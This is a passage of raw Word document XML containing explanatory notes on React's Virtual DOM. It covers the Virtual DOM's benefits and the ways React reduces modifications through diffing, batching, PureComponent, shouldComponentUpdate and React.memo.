      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster repaints</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensure a smoother and more fluid user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE3F3D2" w14:textId="77777777" w:rsidR="008975B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596E383">
          <v:rect id="_x0000_i3556" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D9083"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7. Separation of Concerns (UI and State Management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636DC788"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The Virtual DOM allows for a clear separation between the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UI</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the components' JSX and their representation) and the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the data and logic). React manages the state changes and updates the Virtual DOM accordingly, ensuring that the UI is always in sync with the state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C935D"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This separation improves </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allows for easier debugging and testing of individual components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFDF9EC" w14:textId="77777777" w:rsidR="008975B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8A2F86C">
          <v:rect id="_x0000_i3557" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3669DA35"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8. Platform Independence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4E651"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The Virtual DOM allows React to be platform-agnostic. React Native, for instance, uses the Virtual DOM to update the user interface in native mobile apps on iOS and Android. Similarly, React can be used for other platforms like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual Reality (React VR)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Desktop apps</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via Electron).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09647AB6"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cross-platform support</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows developers to use the same underlying concepts to build apps for different devices and platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC43DF4" w14:textId="77777777" w:rsidR="008975B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F212D4A">
          <v:rect id="_x0000_i3558" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989AF6D"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9. Simplified Rendering Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321BD71E"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he Virtual DOM abstracts away complex rendering logic. When a state change occurs, React calculates the minimal changes necessary to update the real DOM and re-renders only the affected parts of the UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711870BD"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This abstraction simplifies the logic required to keep the UI up-to-date, making it easier for developers to manage and maintain their applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A9F081" w14:textId="77777777" w:rsidR="008975B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6D3327F">
          <v:rect id="_x0000_i3559" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C69CA"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0. Improved Performance with Batching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F35DEC"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act batches multiple state updates and re-renders in a single operation, reducing the number of direct manipulations to the real DOM. Instead of updating the DOM on every single change, React waits until all changes are collected and then performs the necessary updates in one go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67042C"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batching</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> process improves the efficiency of rendering and reduces the number of layout reflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6417D2DD" w14:textId="77777777" w:rsidR="008975B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F44F7F9">
          <v:rect id="_x0000_i3560" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0101620C"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1. Consistency Across Renders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B2035"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Since React always uses the Virtual DOM to track changes, it ensures that the application will render consistently, regardless of the number of state updates or complex UI changes. By comparing the previous state with the current state in the Virtual DOM, React ensures that the real DOM only gets updated when absolutely necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AF4D6D"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This leads to a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consistent UI</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is always in sync with the underlying application state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A081B" w14:textId="77777777" w:rsidR="008975B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E9CA05">
          <v:rect id="_x0000_i3561" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5155CA2A"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63398107"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides several key features that improve the performance and efficiency of rendering UIs in React. From optimizing updates and rendering using the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diffing algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to offering cross-platform support and a declarative programming model, the Virtual DOM is central to React’s ability to efficiently manage dynamic, state-driven UIs. These features make React applications fast, responsive, and easier to develop and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E66A5" w14:textId="3C72A33D" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="3011F862">
          <v:rect id="_x0000_i3562" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="079480EB" w14:textId="32E07BC2" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="00C90812">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="875" w:name="_Toc196308355"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is reducing modifications in Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="875"/>
    </w:p>
    <w:p w14:paraId="14745967" w14:textId="61E05EED" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Reducing modifications in the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to minimizing unnecessary updates or changes to the Virtual DOM and, consequently, to the real DOM. This helps improve performance and optimize rendering by applying only the essential updates, rather than re-rendering the entire UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E969065"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Here’s how </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and other frameworks using the Virtual DOM reduce modifications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E5394"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 Efficient Diffing Algorithm (Reconciliation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694902EB"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React uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diffing algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to compare the current state of the Virtual DOM with the previous state. By analyzing the differences (or "diffs"), React can determine which parts of the Virtual DOM have changed and need to be updated in the real DOM. The algorithm is optimized to minimize the number of changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101ED61"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How it reduces modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of re-rendering the entire UI or re-calculating all DOM elements, React only re-renders the parts that have actually changed. This makes the update process much faster and avoids unnecessary updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FC78C8" w14:textId="77777777" w:rsidR="008975B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205594FF">
          <v:rect id="_x0000_i3563" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB262A1"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2. Component-Level Reconciliation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7E8962"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React's </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component-based architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that updates are scoped to individual components. When a component's state or props change, React re-renders only that specific component, rather than re-rendering the entire tree of components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34697F12"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How it reduces modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: React isolates the updates to the components that need to be re-rendered, reducing the number of elements in the Virtual DOM that need to be modified and improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3CA2CA" w14:textId="77777777" w:rsidR="008975B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E41B070">
          <v:rect id="_x0000_i3564" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E03A4"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3. Virtual DOM Reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E5F66"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hen a component is re-rendered, React uses the existing Virtual DOM nodes for elements that haven't changed. Instead of creating new Virtual DOM nodes from scratch, it reuses unchanged nodes, which reduces unnecessary modifications to the Virtual DOM and, subsequently, the real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353ECE6E"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How it reduces modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By reusing the nodes that haven’t changed, React minimizes the computational overhead and improves performance during state updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45822DE6" w14:textId="77777777" w:rsidR="008975B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91A7C34">
          <v:rect id="_x0000_i3565" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E27A586"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4. Batched Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205DEC5"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act batches multiple updates to the Virtual DOM, collecting them and applying them all at once. This prevents multiple re-renders or updates that would otherwise happen in quick succession when multiple state changes occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76400447"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How it reduces modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By batching updates, React avoids making multiple modifications to the Virtual DOM in a short time. It makes only one update to the real DOM, which reduces unnecessary operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F11A65" w14:textId="77777777" w:rsidR="008975B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81B7D41">
          <v:rect id="_x0000_i3566" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8E5F40"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5. Selective Rendering with shouldComponentUpdate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE8C376"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act provides lifecycle methods (like shouldComponentUpdate) that allow developers to specify whether a component should be re-rendered when the state or props change. This is an optimization technique that can prevent unnecessary rendering if the component’s output doesn’t change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F5BF6"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How it reduces modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By controlling whether or not a component should update, you can avoid modifying the Virtual DOM for components that don’t need to be re-rendered, reducing computational cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3497BAE5" w14:textId="77777777" w:rsidR="008975B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1A10074">
          <v:rect id="_x0000_i3567" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE9A474"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6. Pure Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D56D800"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React’s </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PureComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of component that implements a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shallow comparison</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of props and state to determine if a component needs to be re-rendered. If the props and state haven’t changed, the component will not be re-rendered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A93404"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How it reduces modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Pure components help minimize the updates by skipping unnecessary re-renders when the data hasn’t changed, leading to fewer modifications to the Virtual DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113D6A41" w14:textId="77777777" w:rsidR="008975B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89B33D1">
          <v:rect id="_x0000_i3568" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21E932"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7. Memoization (React.memo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFC1C19"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act.memo is a higher-order component that memoizes the result of a component’s render. If the component's props haven’t changed, React will skip rendering and reuse the previous output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CECB84"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How it reduces modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This prevents unnecessary renders of components whose props haven’t changed, reducing the number of updates to the Virtual DOM and real DOM.</w:t>
      </w:r>
    </w:p>
